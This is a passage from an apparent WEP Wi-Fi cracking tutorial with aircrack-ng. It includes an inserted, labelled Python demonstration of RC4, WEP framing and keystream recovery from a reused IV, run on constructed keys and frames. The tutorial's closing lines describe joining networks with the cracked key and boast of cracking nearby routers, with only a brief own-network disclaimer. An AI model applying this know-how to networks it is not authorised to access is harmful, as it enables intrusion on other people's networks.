If the key was set on the router as raw hex, for example 0F:4A:94:27:AF, there is no ASCII form and only the hex is shown. Don't worry if the password looks goofy; it doesn't matter either way, because you can type in either form and it will connect you to the network.
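To make concrete what the IV counter, the ARP replay and the colon-separated key display above are about, here is an added example that is not code from the study guide: a small pure-Python RC4 and WEP frame encryptor (the 24-bit IV goes in the clear in front of the frame and IV||key is the RC4 key), followed by the reason ARP frames are such good "meal tickets": their first bytes are always the same, so one ARP frame gives away the keystream for its IV, and any other frame sent under a reused IV can be read without the key. The key, IV and frames are constructed for the demo, and the real frame's key-id byte after the IV is left out; aircrack_display and key_to_type reproduce the display format described above.

```python
# Added example, not part of the study guide: a pure-Python RC4 and a
# minimal WEP frame encryptor, used to show what an IV is and why reusing
# one leaks the keystream. Key, IV and frames are constructed for the demo;
# the real WEP frame also carries a key-id byte after the IV, omitted here.
import struct
import zlib

def rc4(key, data):
    """RC4 key scheduling + keystream generation; WEP is RC4 keyed with IV||key."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def wep_encrypt(key, iv, plaintext):
    """Frame body = IV (clear, 3 bytes) || RC4(IV||key, plaintext || CRC32 ICV)."""
    if len(iv) != 3:
        raise ValueError("WEP IV is 24 bits")
    icv = struct.pack("<I", zlib.crc32(plaintext) & 0xFFFFFFFF)
    return iv + rc4(iv + key, plaintext + icv)

def wep_decrypt(key, frame):
    """Reverse of wep_encrypt; raises if the ICV does not match."""
    iv, body = frame[:3], frame[3:]
    pt = rc4(iv + key, body)
    data, icv = pt[:-4], pt[-4:]
    if struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF) != icv:
        raise ValueError("bad ICV: wrong key or corrupted frame")
    return data

def keystream_from_known_plaintext(frame, known_plaintext):
    """Ciphertext XOR known plaintext = the keystream RC4 produced for this IV."""
    return bytes(c ^ p for c, p in zip(frame[3:], known_plaintext))

def decrypt_with_keystream(frame, keystream):
    """Decrypt as many bytes of another frame as we have keystream for."""
    return bytes(c ^ k for c, k in zip(frame[3:], keystream))

KEY = b"k3y!!"            # constructed 40-bit (so-called 64-bit) WEP key
IV = b"\x00\x00\x2a"      # constructed IV; deliberately reused below

# An ARP request is known plaintext: the 8-byte LLC/SNAP header for ARP
# and the first ARP fields (Ethernet, IPv4, request) are always these bytes.
ARP_PLAINTEXT = (b"\xaa\xaa\x03\x00\x00\x00\x08\x06"
                 + b"\x00\x01\x08\x00\x06\x04\x00\x01")
SECRET_PLAINTEXT = b"\xaa\xaa\x03\x00\x00\x00\x08\x00" + b"GET /admin HTTP/1.1"

def demo_iv_reuse():
    """Two frames under the same IV share a keystream, so the known ARP
    frame decrypts the start of the other one without knowing the key."""
    arp_frame = wep_encrypt(KEY, IV, ARP_PLAINTEXT)
    data_frame = wep_encrypt(KEY, IV, SECRET_PLAINTEXT)
    keystream = keystream_from_known_plaintext(arp_frame, ARP_PLAINTEXT)
    return decrypt_with_keystream(data_frame, keystream)

def aircrack_display(key):
    """How aircrack-ng prints a recovered key: hex bytes with colons, plus
    the ASCII form when every byte is printable (None otherwise)."""
    hex_form = ":".join(f"{b:02X}" for b in key)
    ascii_form = key.decode("ascii") if all(32 <= b < 127 for b in key) else None
    return hex_form, ascii_form

def key_to_type(hex_form):
    """What you enter in the OS: the hex digits with the colons removed."""
    return hex_form.replace(":", "")

if __name__ == "__main__":
    print(demo_iv_reuse())                       # first 16 bytes of the secret frame
    print(aircrack_display(KEY), key_to_type(aircrack_display(KEY)[0]))
```

With only 2^24 IVs and drivers that count up from zero, a busy network repeats IVs quickly, and replaying one ARP request forces the router to burn through thousands of fresh IVs per minute; the statistical key recovery aircrack-ng runs on those IVs is beyond this snippet, but the keystream reuse shown here is the property it builds on.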

Just omit the colons from the password, boot back into whatever operating system you use, try to connect to the network, type in the password without the colons, and presto! You are in! It may seem like a lot to deal with if you have never done it, but after a few successful attempts you will get very quick with it. If I am near a WEP encrypted router with a good signal, I can often crack the password in just a couple of minutes. I hope you all liked it. If you have any queries then ask me. Any malicious/illegal activity that you do falls completely on you because, technically, this is just for you to test the security of your own network. I am not responsible for what you do with this information.